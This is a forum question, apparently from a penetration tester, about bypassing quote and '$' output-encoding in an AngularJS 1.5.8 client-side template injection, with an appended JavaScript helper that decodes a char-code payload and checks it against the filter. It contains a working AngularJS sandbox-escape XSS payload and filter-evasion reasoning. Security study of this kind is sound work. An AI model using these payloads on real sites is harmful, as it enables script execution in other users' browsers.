penetration test – Angular Expression/XSS-Payload without Quotes or “$”

I am really trying hard to exploit a Client Side Template Injection vulnerability in a web app I am currently pentesting. I'm so close to getting the payload to be executed, but I am stuck at the last little part^^. It would be great if you could help me out here.

I am able to inject a whole AngularJS expression into the HTML code of the server response. It's a hidden input field and the value is the Angular expression. We are talking about Angular 1.5.8 and I already found a payload which is working with this version:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

Now the problem is that I can't use quotes as they get output-encoded, and I also can't use the $ sign. It also gets output-encoded, as I noticed with my last try. My last idea, which was working in JSfiddle, was this payload:

{{$eval(x =,32,61,32,123,39,121,39,58,39,39,46,99,111,110,115,116,114,117,99,116,111,114,46,112,114,111,116,111,116,121,112,101,125,59,32,120,91,39,121,39,93,46,99,104,97,114,65,116,61,91,93,46,106,111,105,110,59,36,101,118,97,108,40,39,120,61,97,108,101,114,116,40,49,41,39,41,59))}}

I don't know Angular very well, so if anybody can think of a way how I could write the payload at the top without quotes or $ signs it would be really great and you would help me a lot^^. I just want to get it to work xD. The perfect way to test it is JSfiddle (this is for 1.4.6, but you can just change it). You just need to set it to Angular 1.5.8 🙂

Thanks in advance and best regards!
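Added example (not part of the original post, and not an answer to it): a small helper that round-trips an AngularJS expression through a char-code list and reports which characters of a payload fall into the set the target output-encodes. The payload string and the forbidden set (quotes and "$") are taken from the post; the char-code list is the one in the post's second payload, which decodes to the first payload minus its leading "x". The helper names (toCharCodes, fromCharCodes, forbiddenIn, isClean) are my own.

```javascript
// Added example, not code from the post. Shows what the posted char-code list
// actually encodes and checks payload strings against the post's filter
// (quotes and "$" are output-encoded). Helper names are made up here.

// Characters the post says get output-encoded.
const FORBIDDEN = new Set(["'", '"', '$']);

// Sandbox-escape body from the post (contents of the {{ }}), for AngularJS 1.5.8.
const PAYLOAD = "x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');";

// Char-code list copied from the post's second payload (everything after the "x").
const POSTED_CODES = [
  32,61,32,123,39,121,39,58,39,39,46,99,111,110,115,116,114,117,99,116,111,114,
  46,112,114,111,116,111,116,121,112,101,125,59,32,120,91,39,121,39,93,46,99,104,
  97,114,65,116,61,91,93,46,106,111,105,110,59,36,101,118,97,108,40,39,120,61,97,
  108,101,114,116,40,49,41,39,41,59,
];

// Encode a string as an array of UTF-16 code units (what String.fromCharCode expects).
function toCharCodes(s) {
  return Array.from(s, (c) => c.charCodeAt(0));
}

// Decode a char-code array back into the original string.
function fromCharCodes(codes) {
  return String.fromCharCode(...codes);
}

// Return the distinct forbidden characters that appear in s, in order of first appearance.
function forbiddenIn(s, forbidden = FORBIDDEN) {
  const seen = [];
  for (const c of s) {
    if (forbidden.has(c) && !seen.includes(c)) seen.push(c);
  }
  return seen;
}

// True when s survives the post's output encoding untouched.
function isClean(s, forbidden = FORBIDDEN) {
  return forbiddenIn(s, forbidden).length === 0;
}

// Decode the posted list and compare it with the working payload.
function decodedPostedPayload() {
  return "x" + fromCharCodes(POSTED_CODES);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("decoded:", decodedPostedPayload());
  console.log("forbidden chars in payload:", forbiddenIn(PAYLOAD));
  console.log("char-code list is clean:", isClean(POSTED_CODES.join(",")));
}
```

The digit-and-comma list passes the filter on its own, so the check isolates the real problem: the expression that turns the list back into a string and evaluates it must itself be written without quotes or "$", which is exactly the part the post is asking about.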